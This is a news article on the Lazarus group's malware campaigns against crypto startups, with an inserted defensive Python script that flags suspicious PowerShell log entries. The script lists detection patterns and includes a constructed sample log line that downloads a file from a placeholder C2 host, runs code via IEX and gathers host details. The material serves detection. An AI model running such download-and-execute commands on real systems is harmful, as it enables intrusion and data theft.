It has been one of the most notorious cybercrime groups in the world for a number of years. Known as Lazarus, the group is believed to be from North Korea, with reports suggesting it is sponsored by the country's government. It has been behind some of the biggest attacks on record, including those on Sony Entertainment and Lockheed Martin and the Bangladeshi central bank heist.
In recent times, its principal focus has been the thriving field of crypto startups.
According to a report by Kaspersky Lab, the group has been evolving its tactics to avoid detection. Since November last year, Lazarus has been running a new operation in which it takes over its victims' computers, using PowerShell for Windows users and customized macOS malware for Apple users.
The PowerShell scripts communicate with the group's command-and-control (C2) servers and execute commands issued by the operator: the malware can download and upload files, display and update its own configuration, and collect basic information about the host.
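The capabilities described above leave traces in Windows PowerShell script block logging, which is where a defender would look for them. As an added example (not code from the Kaspersky report or from this article), the following Python triage runs over constructed log entries using hypothetical indicator patterns, and flags a script block only when several of those capability categories appear together:

```python
import re

# Capability indicators grouped by the behaviours the report attributes to the
# PowerShell backdoor. These patterns are illustrative assumptions, not Lazarus IoCs.
INDICATORS = {
    "c2_comms":      [r"Net\.WebClient", r"Invoke-WebRequest", r"Invoke-RestMethod", r"HttpWebRequest"],
    "file_transfer": [r"DownloadFile", r"UploadFile", r"DownloadString", r"UploadString"],
    "config_mgmt":   [r"Set-Content\s+.*\.cfg", r"Get-Content\s+.*\.cfg"],
    "host_recon":    [r"Get-ComputerInfo", r"Get-WmiObject\s+Win32_", r"\$env:USERNAME", r"\bhostname\b"],
    "exec_remote":   [r"Invoke-Expression", r"\bIEX\b"],
}

def score_script_block(text):
    """Return the set of capability categories whose patterns appear in one script block."""
    hits = set()
    for category, patterns in INDICATORS.items():
        if any(re.search(p, text, re.IGNORECASE) for p in patterns):
            hits.add(category)
    return hits

def triage(log_entries, threshold=3):
    """Flag script blocks that match at least `threshold` categories.

    A single category (e.g. one Invoke-WebRequest) is normal admin activity; the
    combination of C2 traffic, file transfer, config handling and host recon is not.
    Returns a list of (block_id, sorted category list) pairs.
    """
    flagged = []
    for entry in log_entries:
        hits = score_script_block(entry["script"])
        if len(hits) >= threshold:
            flagged.append((entry["id"], sorted(hits)))
    return flagged

# Constructed sample entries shaped like PowerShell script block log records (Event ID 4104).
SAMPLE_LOG = [
    {"id": "blk-1", "script": "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
    {"id": "blk-2", "script": "$c = New-Object Net.WebClient; $c.DownloadFile('http://c2.invalid/u', 'C:\\Users\\Public\\a.bin'); "
                              "IEX (Get-Content C:\\Users\\Public\\cfg.cfg); $env:USERNAME + (hostname) | Out-File r.txt"},
    {"id": "blk-3", "script": "Invoke-WebRequest -Uri https://updates.example/patch.msi -OutFile patch.msi"},
]

if __name__ == "__main__":
    for block_id, hits in triage(SAMPLE_LOG):
        print(block_id, hits)
```

Only blk-2, which combines C2 communication, a file download, configuration reading, remote execution and host reconnaissance, crosses the threshold; the lone download in blk-3 does not.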
Lazarus acquires its C2 servers either by buying new ones or by compromising existing ones. When the group uses a compromised server, the attack is much harder to detect because the server looks legitimate. The servers are spread across several continents, with most located in Asia and Europe.
Because the group targets crypto startups, it disguises the malware as documents likely to interest crypto professionals. It also builds the malware in different formats to avoid detection. In recent months, the group has focused on Apple products, because startups that are doing well tend to prefer them.
The report urged crypto startups to exercise extra caution in the wake of the attacks:
“If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems. It’s best to check new software with an antivirus or at least use popular free virus-scanning services such as VirusTotal.”
Lazarus has been one of the biggest hacking groups in the crypto industry. According to a report by The Next Web last year, Lazarus was responsible for 65 percent of all the crypto exchange hacks.
The report, compiled by cybersecurity firm Group-IB, revealed that Lazarus had stolen $571 million of the $882 million stolen in 2018. The bulk of that money came from the hack of the Coincheck crypto exchange, the biggest heist in crypto to date, in which the group stole $534 million in NEM tokens.